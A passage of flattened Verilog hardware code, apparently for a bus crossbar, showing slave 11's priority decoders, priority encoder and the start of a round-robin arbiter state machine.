            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[3] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[3]) ) 
        begin
            s11_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[4] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[4]) ) 
        begin
            s11_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[4] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[4]) ) 
        begin
            s11_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[5] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[5]) ) 
        begin
            s11_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[5] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[5]) ) 
        begin
            s11_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[6] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[6]) ) 
        begin
            s11_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[6] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[6]) ) 
        begin
            s11_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[7] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[7]) ) 
        begin
            s11_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[7] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[7]) ) 
        begin
            s11_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s11_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd0_pri_out_d0 ) : ( s11_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s11_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd1_pri_out_d0 ) : ( s11_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd2_pri_out_d0 ) : ( s11_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd3_pri_out_d0 ) : ( s11_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd4_pri_out_d0 ) : ( s11_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd5_pri_out_d0 ) : ( s11_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd6_pri_out_d0 ) : ( s11_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd7_pri_out_d0 ) : ( s11_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd0_pri_out_d0 ) : ( s11_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s11_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd1_pri_out_d0 ) : ( s11_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd2_pri_out_d0 ) : ( s11_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd3_pri_out_d0 ) : ( s11_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd4_pri_out_d0 ) : ( s11_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd5_pri_out_d0 ) : ( s11_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd6_pri_out_d0 ) : ( s11_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd7_pri_out_d0 ) : ( s11_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s11_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s11_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s11_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s11_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s11_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s11_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s11_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd0_pri_out_d0 ) : ( s11_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s11_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd1_pri_out_d0 ) : ( s11_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd2_pri_out_d0 ) : ( s11_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd3_pri_out_d0 ) : ( s11_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd4_pri_out_d0 ) : ( s11_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd5_pri_out_d0 ) : ( s11_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd6_pri_out_d0 ) : ( s11_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s11_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s11_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s11_msel_pri_enc_pd7_pri_out_d0 ) : ( s11_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s11_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s11_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s11_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s11_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s11_next ) 
            begin
                s11_msel_pri_out <= ( ( ( s11_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s11_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s11_msel_pri_enc_pri_out0 ) : ( s11_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s11_msel_arb0_req = { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd0 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd0 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd0 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd0 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd0 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd0 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd0 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd0 ) ) };
    assign s11_msel_arb0_gnt = s11_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s11_msel_arb0_state <= s11_msel_arb0_grant0;
        end
        else
        begin 
            s11_msel_arb0_state <= s11_msel_arb0_next_state;
        end
    end
    always @ (  s11_msel_arb0_state or  { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd0 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd0 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd0 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd0 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd0 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd0 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd0 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s11_msel_arb0_next_state = s11_msel_arb0_state;
        case ( s11_msel_arb0_state ) 
        s11_msel_arb0_grant0:
        begin
            if (  !( s11_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[1] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[2] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[3] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[4] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[5] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[6] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[7] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant1:
        begin
            if (  !( s11_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[2] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[3] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[4] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[5] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[6] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[7] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[0] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant2:
        begin
            if (  !( s11_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[3] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[4] ) 
                    begin
                        s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s11_msel_arb0_req[5] ) 
                        begin
                            s11_msel_arb0_next_state = s11_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s11_msel_arb0_req[6] ) 
                            begin
                                s11_msel_arb0_next_state = s11_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s11_msel_arb0_req[7] ) 
                                begin
                                    s11_msel_arb0_next_state = s11_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb0_req[0] ) 
                                    begin
                                        s11_msel_arb0_next_state = s11_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb0_req[1] ) 
                                        begin
                                            s11_msel_arb0_next_state = s11_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb0_grant3:
        begin
            if (  !( s11_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s11_msel_arb0_req[4] ) 
                begin
                    s11_msel_arb0_next_state = s11_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s11_msel_arb0_req[5] ) 
                    begin
